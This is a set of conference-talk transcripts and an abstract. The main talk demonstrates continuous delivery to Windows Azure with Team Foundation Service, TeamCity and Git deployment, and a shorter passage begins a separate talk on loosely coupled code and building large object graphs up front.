not, like, when I put this slide up, I'm not selling Windows Asher per se, but I'm a Windows Azure in the P.I. Use the platform and I consult on it. So I guess the more people use it, the better it is for me. So it's sort of an indirect sales here. But still, I wanted to show you this because it becomes kind of a no-brainer to use this now. It really, I mean, you get some free credits every month for already paying for MSDN, right? So how many people in the room have MSDN? The majority have MSDN. Have you activated your MSDN free usage of Azure? Yeah, some of you have. And some of you who put up your hand for MSDN didn't put up your hand for the follow-up question. And that's the thing. You have free usage that you are already paying for. You have DevTest environments that you could use for nothing and fast. And then it's a no-brainer to use them. But if you want something for yourself, you could go with this. If you activate this stuff now, there's a current contest going on. You should get in that because basically you need to activate, I think, and deploy something very simple, trivial. And then you're eligible to win an Aster Martin. But I don't bother because I'm going to win it. That's mine. I'm going to get that car. All right, moving on. Continuous delivery. Now, continuous integration is like when you check in or push your code, it gets built and tested and stuff. And continuous delivery is the next step when you move your stuff off into production or move it off into DevTest environments. So picture this, right? You're coding away. You're pushing your code or checking it in, depending on what type of repository you use, into the source control. It gets pulled out and compiled and tested. And then it gets deployed into live production. Now, I'm sure many of you would find that a little bit scary. Like, can you do that? Yes, yes, you can. You don't have to, but you can. And some companies are doing this now. I know companies that do this now. I know companies that go to production several times a day with what they have. And if you're not doing that now, if your company has been around for a long time and you're not doing this, think about startups today. Let's say a startup starts up today. Are they going to go and take their venture capital or their savings and go to town and buy some servers and try to start hooking them up and connecting them? No, they're not. You're going to get something like Bispark or something like that for Microsoft that they get free usage. And then you're going to go and use this environment, this platform for all of their stuff. And they're going to go with continuous delivery, probably to production straight away, because that's the way they think. So if you're not doing it, think about what that kind of means to you. These other guys are going to be so much faster. Maybe you don't have to be fast, but you really want to have a streamlined environment. So these are some strong motivators to doing this. And so even if you don't go to production, I mean, you could code stuff, check it in, have it built and tested and put it on a DevTest environment. So you're always refreshing, continuously refreshing your testing environment during the day. Still, that's pretty good. That's very useful. And the setup of this is really easy. End of this talk is going to be all demos. So it really comes down, right, to these three little words. Automate, automate, automate. That's what you have to do. That's the way to set this up is through automation. In fact, everything that can be automated must be automated. I like that quote. I wonder who said that. Anyway, luckily, there is some support for this stuff in Windows Azure, right? That's what we're here to talk about. So let's talk quickly or briefly. I'm going to try to be as brief as possible about the three ways to deploy your applications to Windows Azure. The first one being virtual machines or the one that I talked about first, it was actually the last one available from Microsoft. It was the virtual machines. So running VMs, hosting VMs in Windows Azure, that's all about controlling that through PowerShell. Do we have any PowerShell gurus in the house? None. Right. I neither am I. I'm mostly a Dev, so I'm not an IT, I guess we don't have any IT pro people because they usually are wizards at this stuff. But you can do really powerful things here. You can just crank up a new server or launch a server just like that using a simple script. And it really is simple because I can write them. Like literally just a few lines of script code. Bam, you get a new server attached to a virtual network and some ports and extra disks and stuff set up. It's a one liner, really. And that's very, very powerful. And now, which wasn't the fact before, but now, since general availability, when you stop a virtual machine, it doesn't cost you anything. It used to cost you money. You had to like unhook it from your deployment slot in order for it not to cost anything. And then you had to like mount it back if you wanted to launch it again. And that took some time. But now you just have to press the stop button and it's not costing you anything. So you could have a build server or something running in Azure, which you just stop when you go home at night with a script, with a simple PowerShell script, stop this virtual machine. The cloud services, now there was some Windows Azure users in the room. You've used cloud services, right? Most of you. Okay, I see some nodding. Yeah. So cloud services, that's where Microsoft started their journey to the cloud. That's the cloud for Microsoft from day one. Cloud service and a website. What's the difference between a Windows Azure cloud service and a Windows Azure website, anybody? The difference, well, the difference is that the website is a hosted environment where you deploy your website, too. But the cloud service is sort of like a virtual machine, but it's sort of just still taking care of by Microsoft, right? You don't have to run any patches on this thing and do any hot fixes or updates or empty logs or, you know, care for the machine like you would a virtual machine. If you run a virtual machine, you have to take care of it. But if you run a cloud service, all you need to focus on as a developer is building your code, building your business, creating your application and taking that application and the data to Windows Azure. Just deploy it there, have it run in that environment. And then, of course, you have a scenario where you don't have to care about the fact that it's running on a virtual machine that has an operating system that needs patching. All that is taken care of. And Microsoft started their journey to the cloud with this. And, of course, they realized that a lot of people really want and really need to have the virtual machines. So they've brought that along later. But they started here. And if you think about it, that's kind of difficult to do. You get full admin rights on these boxes. You can run scripts and PowerShell in full admin mode during the startup of these things. But automation is key here. You have to automate this because Microsoft will refresh your machines from now and then restart them. For instance, maybe take your machine down. It seems like this machine is behaving funny. We'll take it down and give you another instance. And when they give you another instance, they have to be able to rerun all of your automated, automated automation. Now, you can run, you can deploy to a cloud service, automated in Windows Azure. We're mostly going to talk about these guys today, the websites. But I have demo, I have a demo on the cloud service as well, if you want to see that. I'm going to let you guys decide which demos to run later because I have plenty of demos on this. I've been doing different talks on this and I have different types of demos. And we'll do the ones that you want to see. And if there's a demo that, excuse me, if there's a demo that we don't have time to do, you can ask me just outside the room and I'll show you personally the demo of whatever you want to see. Okay? The website is just hosting your website in a hosted environment. It's as simple as that. But seeing that, I still feel that I need to point something out, which is, I guess, kind of obvious, but still it needs to be said that it's not just hosting the website in Windows Azure because that's, I mean, you could do that anywhere. There's plenty of website hosters. You can just go to town and buy some hosting. Hosting on Windows Azure means that you are going to be very close to some very powerful, some very powerful other features like there's a powerful service bus there. There's a caching that, some caching mechanisms that you can take care of or take in use. And there is like security stuff with access control service and things like that. So there's like this whole portfolio of things that are near to your application, which you can take advantage of in Windows Azure. So that's sort of the actual real value for running production environments in Windows Azure, I think, because hosting a website, anybody could do that. Let's talk about beliefs just briefly. Microsoft has a belief. Microsoft believes that platform as a service provides the best foundation for creating, running and managing custom applications the best. Doesn't say that Microsoft believes that it's a good okay or fine foundation. It's the best one. Does that mean that they don't care for infrastructure as a service? Of course not. Of course it doesn't mean that. It means that if you can move your applications to a pass, a platform as a service experience, instead of running it as infrastructure as a service, then it's going to be better for you because you'll be able to focus on what's important for you. That's the thing. So this is a belief that they have. If you can move in that direction, do it. And if you think about it, you're not taking something away from the IT pros. There were no IT pros in the room, but you're not taking anything away from these guys. You're actually giving them a free pass of not having to deploy and manage an IaaS. If you think about it, you're gonna have to think about that for a while. Because it is easier to host and manage these applications that run on platform as a service than it is compared to hosting your own virtual machines. And these are all the, this is the first slide. I made it a little bit gray to make it look kind of old. This is the first slide of the different publishing methods that Microsoft created for Windows Azure websites when it was introduced. Now, Windows Azure website is not in production. It's still preview. Anybody could, you know, make their educated guess on what timeframe they have for going into production with that. It's very soon. That's what they say officially. It's going to be soon in general availability. And it just might be very soon. And very soon there's a conference in the US. So my guess, not Microsoft saying anything officially, my guess is that general availability will probably be in the build timeframe. So very soon, if that's true. So when they came up with it, they had these deployment methods. I'm not gonna show you FTP because, I mean, it's cute, but it's not really what we're here for. WebDeployer did, but that was just to get us a fresh site for our demos. And then they had Git and TFS. And quite quickly afterwards, they added support for integrating with Codeplex and Bitbucket and GitHub. And on Bitbucket and Codeplex, you can also use if you want Mercurial or Git. And on GitHub, I guess, Git. Those are the supported methods of using it. And TFS, in this case, stands for Team Foundation Service, the hosted TFS. Now, it's possible to do these things from the Team Foundation server, which you might have. Anybody have Team Foundation server? A few, yes. It's totally possible to use that, but you have to set it up yourself. There's really no public supported method of, here's how you do it currently. But I'm sure there will be at some point, it's just that Microsoft hasn't gotten around to it yet. And also, I have this custom secret version that I'd like to show you guys if you want to. But now, I mean, now things have gone completely bonkers. Now you have lots of other methods to use as well. And I guess you have the Team, you have the Visual Studio there, the Team Foundation Service and the Bitbucket thing. You can use Bitbucket or Dropbox, I mean, you can use Dropbox to deploy to Windows Azure. That's kind of cool. And some of you might be wondering why I'm using a laser pen right now. It's actually quite silly. Laser pens are good for one thing, really. That's what they're good for, for playing with your dog. So I'm not going to do that anymore. Sorry, I just wanted to point that out. Don't ever use laser pointers. Supported publishing methods for Azure are all of these. So you could use your own Git repository if you have one, your own external repository that you use. You could use your local Git repository in your local box. And you could use all of these other services, you know, pick one. And you can still do also your own custom version. Anybody have any questions so far? Yes? What happened to Subversion? Yeah, I haven't heard anybody say anything about Subversion for using that with Windows Azure. I suppose it's possible to do. I'm sorry, man. Subversion is not up there. I think you may be the first one who's ever asked me this. I applaud you for it, and I agree. It should be up there, but it's not. Put that in the custom box, but I don't have anything that I can show you today. Damn, I have to go create a new demo. Okay. Love the question. I love the question. And so here are all the demos. Now, the rest of this talk, we have plenty of time. I'm going to show you guys demos, right? I actually have a little bit of a wrap up in the end, but I can show you guys, you know, any demo you like. The first one up there is on the cloud service, right? And then I have a bunch of them on websites, and the content delivery using Team Foundation Server one is more of a conversation, really. I can point you to how you would go about setting that up. And I actually do have a Team Foundation Server at the office, but I haven't set that up myself, but I know how to do it. It's not impossible to do. You have to sort of go in and change the scripts yourself. So, you guys, it's up to you. Which do you prefer to see? Anybody? Cloud service? You want to see the cloud service one? Is that okay? Okay, sure. Let's do the cloud service one. So, I guess since you have been using Windows Azure for a while, cloud service would be cool for you. Okay, good. Let's see now the cloud service. Yes, that's a separate demo. In fact, I'll start from the portal on this one, and the portal is there. So, we need now a, we could use this NDC one. No, we need to use the cloud service one. I wasn't prepared for that one. Cool. I thought you were going to go with a website one. I'm happy that you went with the cloud service. So, we'll create ourselves a new cloud service. Do you think NDC? No, it's not. NDC Oslo, that's available. And let's not put that in Southeast Asia, let's use North Europe. So, create ourselves a new cloud service. And I have here on disk, I have a folder which we're going to use. It's in the demos. Here's my cloud service, TFS service demo folder. In fact, let's do this. Let's go fresh. So, there's nothing in here. We'll use this URL. And I have by now, yes, I have the NDC Oslo site ready to go. There's nothing in there now. Nothing is deployed, right? If we want to set up continuous delivery using this, you go to click in on the site and you use integrate source control, set up TFS publishing. That's the one which is supported for cloud services right now. With the websites you can do GitHub and all other kinds of things, but here you need to do TFS. And I have this. This is my TFS service, my personal one. We have one for the company, but this is my personal one. I have to go in and say authorize. And I have in there already, authorization process is a one time thing where you connect. And I have in there cloud service continuous delivery demo. I think it's the one. So, I'll connect up to the cloud service. Let's see that I make sure that it's cloud service continuous delivery demo. Okay. We've got to remember that I have a lot of different demos in there. So, I'll just connect this up and set it up so that I have my code in there. In fact, maybe I did a mistake now because let's go to my Visual Studio. This is my team foundation service, right? This is where I keep my projects. And I think it's going to be better for us if I just create a new one. Let's do NBC cloud service. You'll probably have your code already in there, but we'll create a new one. It's quite fast. And we'll hook it up to that one instead. I'll just go in and remove the mapping in here. You have to go to the little cloud and disconnect from TFS again. So, it's actually quite quickly, quick to do this. By now, I guess, I'm still creating. This usually is quite quickly quick to do. Creating the team project. I want to make sure I refresh this. And now it's created. Cool. So, we'll use the one with the NDC in the name so we know that we have an empty one. I want to show you from the top, not deploy something that I've already prepared. Now, let's set up TFS Publishing with a new one. That's better. Accept. And then we picked the NDC cloud service one, which I just created. That's the one. Cool. Linking. So, now we have that. And now we're going to go to Visual Studio. And we'll use this website that I have here. And let's just change the text on it, right? This is, this site is deployed using TFS and cloud services. Cool. Let's use that. So, this guy now needs to be published. So, I need to connect up to my Team Foundation server project and make sure that we get the cloud service, NDC cloud service, right? We need to map that down to our local drive to make sure that we can check in some code. So, we'll map that down to our local drive. Oh, that's, oh, it's already, it's already mapped. Let's do two then. Map. Because I've done this demo before. This folder name was already in use in my mappings. So, let's just do a two one because I have a new folder here. All right. That's it. And then I have my website. So, I'll copy my website in. You probably already have stuff in your source control. But here's a full, full website that I'm just copying into that folder which I've mapped to. So, again, this is my repository in the Team Foundation service. And it's mapped to my website, my cloud service in Windows Asher. So far so good. I'm going to copy all of this stuff in. And then we're going to go and open up the solution. That's a browse to it. And it's that one, right? I'm just copying. I'm done soon. Because I have all the NuGet packages and stuff on my local drive. So, that's why it was quite a bit of stuff in there. So, here's my, here's my site now. My code. This would be your code. And what we're going to do, of course, is look here on the site when it says right here, TFS will build your project and deploy it to Windows Asher on your next check-in. So, we're going to have to go and do a check-in because we haven't checked anything in and it's hasn't done anything. It's just synced up for the first time. But now we've got to go and, and, and launch this baby and make it do what it's supposed to do. Just going to have to wait for the project program to respond. Any questions so far? Yes, sir? That is correct. Yes. That's, that is correct. Good question. Automatically, you get a production and a staging slot for cloud services. Most of you probably know this, but yes, that is the scenario for the cloud services. So, it's used for a deployment scenario where, where you do what is called a VIP swap. And it means that you have your code and you have your application in production. What you do is then you deploy the new version to staging and they're just side by side. The new version you can browse to it, it gets like a, a, a GUID based URI. You can browse to it and test it and see that it's okay. And then you say swap. And then what happens is that the load balancer will swap virtual IP addresses inside of the load balancer and say that this should go through that and that should go through this. And then you're, instantaneously, your staging site will be in production. And vice versa. That's what it's used for. Awesome question. Keep them coming if you have them. Your questions are the most important thing in here today. So, we need to, of course, add our code, add items to the folder. We'll just go ahead and add everything except for the packages. We don't need those. And the build process templates are also already added. So, we really don't need that either. We'll just go and add all of this. I've set this up. Why I'm not adding the NuGet packages is because I've set this up to use this enable the NuGet package restore thing. So, if, if you build your code and the NuGet package is not present, it's going to be automatically downloaded. And that happens also on the build server. So, you don't have to check in all your NuGet packages on the build server. I think that's a good thing. I don't think that you should check in stuff like that. All right. So, now we have our code. This is a website. I can actually can't launch it. I'll have to go and, oh, wait a minute. I do have it in admin mode. So, I could launch it locally, but I don't see the point. It's just a website right here. And a test project. And our little cloud service right there with a web role in it. That's, that's all we have. So, it's a very simple project. But what we need to do now, of course, is to check this in. And we'll do pending changes. And check in. Initial blah, blah. Everybody writes initial commit or something like that. Yeah. Initial blah, blah. So, we'll check in the initial blah, blah to the server. Cool. And what's going to happen now? Anybody know? What's happening right now? We're checking in. Well, I guess we're not done yet. All right. It's a big check in. It's successfully checked in. All right, cool. So, right now we're going off to our project. The new one we created, the build server is kicking in right now. And it might have already queued up. Yes, there it is. It's already queued up a build. So, what I get out of the box when I say, connect this cloud service to the team foundation service. What I get out of the box is this continuous delivery deployment script. It's right there on the left. On the far left, it says, NDC Oslo underscore CD, right there. So, I get out of the box a setup for deploying this stuff. And it's running right now. And this is actually going to take a while because what it has to do is it has to do several things. It has to get all the code, put it on the build agent, build it, run the tests, and so forth. And then it's going to, after that, it's going to go ahead and deploy. And deploying to Windows Azure is no longer a 20-minute process, right? It's more of a six, seven-minute process. But still, it's going to be a six, seven-minute thing that's going to happen here. So, I think that maybe we shouldn't wait around for it, just stand here in small talk. We should just go ahead and do another demo while this thing happens. And I'll show you the result, okay? So, we'll just leave that running and go back to the slide. But that is how easy it is to set up. I mean, it's out of the box, it's default behavior. And you can if you want to. Maybe I should show that. You can if you want to. And that sort of speaks to the how do I use my own team foundation server scenario as well. You can use your own team foundation server because you can edit the build process templates on these things. And let's see, it's under builds, right? Let's go to home. All right, I have to be connected to my specific team project. And we want to have cloud service. It's the one, NDC one, that one. So, we want to have that. And now, we'll go to builds. And we see, it's the same as always, we see that we have the NDC Oslo underscore CD, that's continuous delivery or continuous deployment, I think it's Microsoft's term here. That's the build process template that we get. And we can go in and edit the build definition and make changes to it. Completely possible. And many of the same things that are available for you today using team team foundation server are also available here. I bet if we go into the nitty-gritty, there may be some settings in here that are not available. Okay? So, I bet that's true. Also here, the build process template that we're using, it says here, Azure continuous deployment something and so forth. And that template is available to you. It was downloaded as part of the source code. It's right in here. So, the templates, all of that stuff is in there. If you have a good team foundation server guy, I'm sure he or she can figure this out and set it up from your team foundation server so that you can do the same. But of course, Microsoft is, I guess, prioritizing as hard as they can. And right now, they're pushed this stuff already out into like this out of the box experience into the team foundation service. Right? And you can emulate this on your local stuff if you want to. Let me just make sure, let me just switch back to the build. Oh no! What happened, Magnus? It's not working. Sorry, I'm just being silly. So, something is not working here. What is that? Hmm. It seems like it's compiled and it's, gives us an error message and hmm. Yeah, one error. Let's go to the site and see. So, we're not going to get this deployed into production. It's actually going to be deployed into the staging slot. And it says that the deployment failed because the default behavior is not to go to production. It goes to staging. And we have this deployment thing that we launched and it failed. And it's, the good thing is that it shows up here in the portal. You can go in and check and see, oh, wait a minute, I didn't get deployed. I wonder why. So, we can go into the log and that actually brings us all the way back to the log here. And, and we can see that. Let's see now. I can't actually see the details here. So, we need to go into the log and see. That's interesting. Thank you, sir. You couldn't find the Nougat stuff. That's because when I did add, right? That's not the, this, actually, this is not the error that I was looking for. This is not the droid you're looking for. But if you go add items to folder and you check on the Nougat thing, you have to make sure to get this in there, right? Because it does, by default, it doesn't include XC files, right? So, you specifically have to say, no, no, no, I don't want that excluded. I need that included. Okay? So, you need to make sure that you get all the right stuff in there. But that was actually not the error that I was looking for. That was why I was a little bit confused. I was looking for this. My, my test fail. But now I'm not going to redo it again and show you that, oh, my god, the unit test is failing. This will fail the build and it will stop the deployment. So, I will now do this to make sure that our test runs, just to make sure that we won't get another build fail here. We'll go back and take our pending changes, our addition of the Nougat XC and the tests. You know what the Nougat XC does, right? Or don't, anybody doesn't know? That's okay. I mean, the Nougat XC is the little, the little XC file that makes sure that you can do this package restore thing on your Nougat packages. You have to check that in so the build server can reach it. Fixed Nougat XC and the test. It's actually a good check in common because I only have one test. So, it's that test. So, we'll check that in and that'll of course fire off a new build and, and then it should, this time it should work. But again, it's going to go back and redo this process again. So, we've got a new build queued here and it's going to take a while and so forth. All right? Any more questions? I like how the, the team foundation service, yes sir, a question. Do I have a demo for Team City? I don't know. Anybody asked, told you to ask a question? Well, I might show you a demo on Team City and I love the question and you've totally given away all my, half of my talk and I, I love you for that. It's the no Microsoft one. No, no Microsoft in this instance, of course, doesn't mean do not use Microsoft stuff. It means not only Microsoft can use, you know, team server and team, team, team foundation server and stuff like that. You can use also Team City. I might show you that demo now, should I? And it's an awesome question and I love you for it. You actually blew away a part of my presentation and that's great. So, the no Microsoft demo is that demo. Let's have this guy run and, and see, make sure that it works now and so forth, right? Is it working? And so, there's the failed build right there and there's the new build right there and in here you can do all the, all those sorts of things also set up users and stuff like that. But if you're not using team foundation service and if you're not using team foundation server, you might be using something else. And, and this is not set up for cloud services though, is set up for websites. You can do it for cloud services. It's not, there's not a lot of difference. It's perfectly possible to do, but I've set it up for websites and it's the some other demo, demo. Right? The some other demo, demo is a, we browse to it and it's right there. So, it's using some secret deployment method, which we now know is not very secret. I'm going to show you what deployment method we're using by doing actually another demo while I'm in here. If you click into configuration here and scroll down, you see that I'm hooked up to Git. Okay. I'm hooked up, hooked up to a Git repository. And if you keep scrolling down, you get app settings and connection strings. Now what you can do with app settings and connection strings for Windows Azure websites is that you can enter values here. We have one here. It's the close, disclosed deployment method and it's set to false. Let's flip that over to true. And also at the same time, we're going to go over to our solution, some other demo and show you that the app settings here are overridden. So, when you make a configuration manager.app settings or.connection strings, that'll actually get intercepted and overridden and it'll read these values from the portal. And that's really good because then you can have your developers, they can have their dev settings, all whatever settings they like, but you just override them in the portal and they might not even have the ability to connect to the live database. So they can't make a mistake because they don't need to connect to the live database. They only need the dev database. So you can override that and it's really powerful. And in Visual Studio, I have some other demo web and it has the same setting in there. The app setting, disclose deployment method and it's set to false and that's the stuff that we get deployed. So I'll just set it to true and save and it's already changed and I'll go back and refresh. I'll go back and refresh. And as it refreshes, you get Team City. If you want to set this up, if you want to do it, you might wonder where you, so sure you can run your own Team City on premises and use the stuff that you usually do, but I actually have one running here. I'm running it in Windows Asher. So I have one which is running right now. I'll copy the URL for it and browse to it and it's right there. So this is my Team City running in Windows Asher. I wanted to show you that because I wanted to draw your attention to the world's longest blog post. It might be. It's very long anyway. Continuous delivering on Windows Asher, not only Microsoft style with Team City. It's on my blog. You can go to that and it's like, it's a mile long. Now, the reason I show you this is not to draw attention specifically to my blog, but this is the blog post you need to do this. If you want to set it up on a virtual machine in Windows Asher, do it yourself. This is the blog post that you need to do it. And also the point here is, if you're not using the Microsoft way and using their built in out of the box experiences, which you set up in like 30 seconds, then you're going to have to do it your own way. And it's going to be painful and it's going to be an ordeal and so forth because you don't have any support for it. And when you're done, you get something that actually works. So I'll put that to the right left there. And I have the website here. So we'll go ahead and make a change to it because we're now using Git. We're going to have to get our Git shell set up. So I'm using Git for this. You can use whatever version you use, but I'm using Git. And we'll go to demos, some other demo. Actually, there is a change in there. But just to make sure, I'll make it change. We'll make one more change. I'll say it's the new version of the site. So I made some changes. There's two changes now. Cool. And what you need to do now is Git add or I can actually do the Git commit. Git commit with a message testing. Okay. So where am I pushing this? Well, I'm pushing it. It's Git remote minus V and show you that yes, I'm pushing this to GitHub to repository I have over in GitHub. And it's the only source that I have. So I can just say simply say Git push because there's only one place to push it. And I'll push it there. So now pushing my changes into GitHub, are you using GitHub? Using Bitbucket by using Git or Macural. I think that'll work the same. But you'll have to set your team city server up for using Macural, which I guess you already have. So that's a cool option. I didn't have a specific demo for that. But it works the same, right? It's very similar. So now push that code away. And in a little second or two, this guy is going to pick it up and build it and do the deployment. Now you have to be careful there. You have to go in and tweak this and set it up. And it's kind of, before you're there, it's going to take you a while. Are you using cloud services or websites? All right, right. So but you have a web application? All right. But yeah, yeah, yeah, yeah, sure. Sure. So now you see it's picking the build up and I have two build steps there. One is one is take all the code and build it and test it and do all that. And it's actually going to fail because I again, I wanted to show you that I have not only micro soft style here, I have a unit test in here as well. But it's not any it's not Microsoft test, it's an unit. Okay. So because I have full control of my environment now, I can use whatever testing framework I like. If I want to use this testing framework, I'll do that. And again, I'll need to go back and do a fixed test. And then I'll go ahead and do another push, right? So we're going to have to do it one more time. I wanted to show you that of course I can use since I take, I take full responsibility now, I take full control of this thing. I'm going to have to do everything on my own, but you can totally do it. And in the end, it's going to be worth it. Of course, it's worth it to set up automated stuff. So this is going to run through now and it's going to deploy. It's going to push back the website to the live environment. Now, this I guess is a good time to show you a little, to give you a little history lesson. Yes, sir. Question? That's correct. That is an awesome question. My God, you're at the end of this build, are we just pushing that into the Git repository in Azure? You are correct, sir. That is, I applaud you for that because that's actually exactly what I was going to show you. You guys are ahead of me. That's brilliant. I love the interaction here. You guys, so yes, you can do it two ways. You can use web deploy from here and do web deploy to your Windows Azure website. I showed you web deploy as my first demo. That's perfectly possible to do, right? But you could also push to the Git repository in Azure. If you set up a website with a Git repository, you can use that. That is actually what happens when you integrate with Git. You get a Git repository set up in Windows Azure and then you push your code and it can go straight to that. Why would you want to do that? Well, as it can compare to using web deploy, web deploy is easier, right? Yes. You do get history of your builds and your deployments inside of your Team City server and inside of your Team Foundation service as well. You can go back to those and relaunch an older build. But there's a reason why you don't want to do that. It's because the portal comes with a built-in version history. So this is now deployed. My new change is now deployed. And if I go now to my website, it's the some other demo website, I have a bunch of deployments because this has been around for a while now. And I have this deployment history here inside of the, there it is. So I have the active deployment right there. And if we browse to it and refresh, let's see that it's the new, there you got it, right? It's the new version of the site. Okay. That's the version that I pushed from, from my machine into Team City and it's now deployed. If I click back to the previous version that I did, I actually did that thing this morning as I was going through these demos and I go back and I say redeploy. Yes, I want to redeploy. It's now deploying the old version of my site. Into live production, there is zero downtime and it's already deployed and I can go refresh here and it says the old version. Okay. So I get a version history inside of Azure. So it keeps around a set of, of older deployments for you, which means that if you go from your dev box into live production and there's a problem, somebody's on the phone screaming at you, what the hell? What did you, sorry, what the bleeding, something really bad. Then you can just simply go and redeploy the old version. It's done in seconds. Okay. Yes. What happens if someone's already logged on if you have like an authentication system? Yeah. It's there. It's, it's, there's no downtime and nothing happens. What they do under the cover stairs, they move the virtual path from one directory to another. There's no, there's no reset of your application or anything. They're all still in there and everything just works and it's really cool. So it's, it's so fast that I, I'm just going to do it again. That's how fast it is. So this is, this is one thing which could make you consider go to dev to production because it's that fast. It's already done and it's, it's very stable and useful. So if I had from the team city server, which I did in my first version of this demo, used web deploy to, to publish, I wouldn't get this history stuff. I would only get the current deployed site. So which is why I did exactly what you said, sir, in the back row. I did the from the team city build. Once it's built and tested and it's all good to deploy, it uses git push to push the thing into Azure because then you get the version history in Azure. Any other really good questions because your questions are awesome. Yes. Well, no. The version history to my knowledge can use other things than get for the, for the deploy part, right? To deploy to Azure. As far as I know, support is currently for git and for team foundation service. You can, you get the same history stuff with using the team foundation service and, and git. But I, I haven't tried mercurial, which is a good thing. I need to test that. I'll test it and get back to you. And it's, it's very, you can send me an email and I will definitely, I will definitely get back in touch with you on that. That's important. To test if Microsoft have, have already put up, I bet they will, but if they already have put up the, the integration with, with version history for mercurial, that's, I suppose what you're asking for. Yes, mercurial. Good question. Guys, we have less than five minutes left. I've shown you a bunch of demos. Of course, I have a lot of demos left. Let's go back to the, the team city one just to make sure that it's, it's okay now. There you go. The NDC cloud service that we deployed, it went into production and it's a cloud service. No, not a virtual machine Magnus, a cloud service. Yes. There is the NDC Oslo and we have staging, staging running with a, oh, it's running with a nice, with a nice check mark. And now staging is running and I can go to staging. I can browse to it. There you go. There's the GUI based URL, which you can use for testing and make sure that your environment is now up and running. That's actually says this site is old, but it depends on what code I put in my repository. And then I can do staging production still doesn't have anything in it. So what I want to do now is of course swap this thing into production, swapping the deployment in cloud service NDC Oslo. And now we're going to swap the staging environment into production. Takes a few seconds. Your deployments are being VIP swapped. All right. So that's, that's going to put the site into production. But you see from, from like me checking in the code to team, team foundation service, it built and deployed everything into a now live running environment. And now it's live. So now if I go to this URL, now this site is live. The NDC Oslo one is live. And the other one should if I get my browser to refresh. It still believes that's the old one. It's not there. Refresh. Anyway, point is that it's now, it's got one deployment in of this thing and it's in live production. Okay. So staging is empty and production is running. Okay. So that was that. We have a couple of more minutes. I have time for a few more questions. And I want to show you also, of course, continuous delivery is extremely important. You got to do it. If you're not using it, wait, there's more. I just want to not be the sales guy, but quickly show you that Visual Studio is free. All of the SDKs and all of the coding that you ever want to do, whichever flavor you have, is there available. All of those SDKs and all of those tooling is open source on, on GitHub. And you just go in and click some, try it out. It used to look like this, but now, nowadays, to try, try Windows Azure for free looks like that. You get like a credit of, of dollars every month, right? You click in there and you activate your benefits. First of all, people activate your MSDN benefits for Windows Azure because you run for free in, in Azure because you get a monthly quote. Like if you have the smallest MSDN, you get 50 bucks. The bigger one is, is 100 bucks. The, the ultimate is 150 bucks of free usage every month, which you can use on any Windows Azure service, anyone you want to use. And it's really is for free. And it really is also so that it has a limit. So when you reach that ceiling, it's going to shut down for the month. And you get the next month, you're going to get it back again. You can start from zero again. So you really need to do this. And also the team foundation service is five users up to five users for free for now and forever. And so if you have a startup team, this is going to, you get the full benefit of the team foundation service for free. And this is you. Once you win the Aston Martin, that's important. Remember that. All right. That's what's, that was all of my slides. I wanted to make sure to show you the path to go down if you want to. I, we're out of time. You have any more questions? We have time for that. So I hope that this was a useful session for you. I hope this showed you that if you don't use this, then you're, you're basically robbing yourselves of a free testing environment. So thank you guys for coming. It was a pleasure to talk to you guys today.
|
Ever felt you spend more time packing deployments, configuring test environments and deploying the latest build, in order to please the testers, than you spend writing actual code? Had your flow interrupted by the boss wanting a demo environment set up for a customer demo? We simply can't be interrupted in our creational flow of #awesome code by the worldly dealings of these simpletons! Fortunately, built into the Windows Azure Platform, there is great support for Continuous Delivery of the greatness you just built. With little fuss you can set up automated builds, test runs and deployments so that you may focus on what’s important – the uninterrupted development experience. Everything that can be automated must be automated!
|
10.5446/51472 (DOI)
|
All right, seems like time's up. So hello, everyone. Hoping that you're having a good conference so far, last day of the conference. So this talk is called Big Object Graphs Up Front that you can currently probably tell. When I made this slide, I apparently thought it was much more important to put my Twitter handle up there, so there you have it, but my name is actually Mark Seaman. So this talk is a talk that relates to loosely coupled code. So some of you will know this as dependency injection or inversion of control. So I'm also the author of a book called dependency injection in.NET, but I'm going to talk about things that relates to dependency injection or inversion of control, but I'm just going to call it loosely coupled code and contrast that with tightly coupled code. So that's the edge in the photo today. And this is not an introduction to writing loosely coupled code. I expect that you've seen a little bit of programming to interfaces and stuff like that before. So this dives into specific aspects of writing loosely coupled code and geeks out on that. So it's a kind of a very specialized talk, but I think it's important because it addresses problems that people tend to have. So the purpose of this talk is to dispel fear, uncertainty, and doubt, because what happens is that when people start to grok what dependency injection or loosely coupled code in general is all about, what happens is that they become very uneasy. And one of the things they become very uneasy about is that when you realize that writing loosely coupled code is all about writing code in a way so that you construct a rather big object graph on the front and then you go and party on that, that tends to scare some people away. So that's just my very brief introduction to this. So I'll go back to exactly what that actually means. So the agenda here today is I will talk a little bit. I will just give you a brief introduction about constructor injection and writing loosely coupled code and this thing called a composition root, which is where we talk about big object graphs up front. So the reason why I'm saying big object graphs up front is just because I thought it sounded funny, kind of like big design up front, but it's actually not related to that at all. It's just this concept of creating one big object graph and then let it do whatever it's supposed to work, whatever it's supposed to do. I'm going to spend a little time with that and then I'll address some of the concerns that most people actually seem to have and they fall into two categories, a concern about composition speed and a concern about memory footprint. So I'll talk for maybe a quarter of an hour and then I'll dive in and write a lot of code. So I'll write lots of different variations of a graph to see what it actually means to create an object graph up front. So that's the plan. So constructor injection, just a very, very brief recap. The idea about writing loosely coupled code is that if you have this class like this foo class here, apparently it looks like this foo class requires an instance of ibar, which is an interface, and I've left out all the actual implementation code here just to focus on the constructor. But you can imagine that the foo class has a method that does something that actually requires the presence of ibar to actually work as intended. So ibar is an invariant of foo, meaning that foo does not work without ibar. And the way we do that when we work with constructor injection is that we say, well, we'll just have one single constructor of foo that requires ibar as a constructor argument. So there is no normal legal way of creating an instance of foo unless you pass it ibar. You can pass it in normal and I'll get back to that in a little while. That is also illegal. There is really no legal way of creating foo without passing in an ibar. So it's very apparent to anyone who looks at this class that it requires ibar. So now we have another class called bar that implements ibar. You can tell it's the same story. It requires ibar in order to work. So it has a constructor that actually takes in ibar. So creating a foo instance might look something like this. So this does not really seem to concern most people. So you create a new foo, pass in a new bar, and then you have some sort of concrete bar in a pass instance that implements ibar. This does not concern most of you, I guess. What we have to do with this is this scary. This tends to scare people. I don't know exactly when it happens, where you go from being not scared to being scared. So don't worry about all the strange things. If you look up something called metasyntactic variables and Wikipedia, you will just see this is just all this foo bar pass thing just continue it on. So I didn't come up with these names. It was actually just took them from the list. Anyways, so you can imagine that instead of being foo and bar and so on, this is actually your controller that has your dependencies that has your lockers and blah blah blah injected. So this is just dependency injection in action. But I'm just keeping it general in order to not let the noise actually confuse you. So now you're just confused by the strange names anyway. So I can't win here. Anyways, this actually tends to concern lots of people because this just 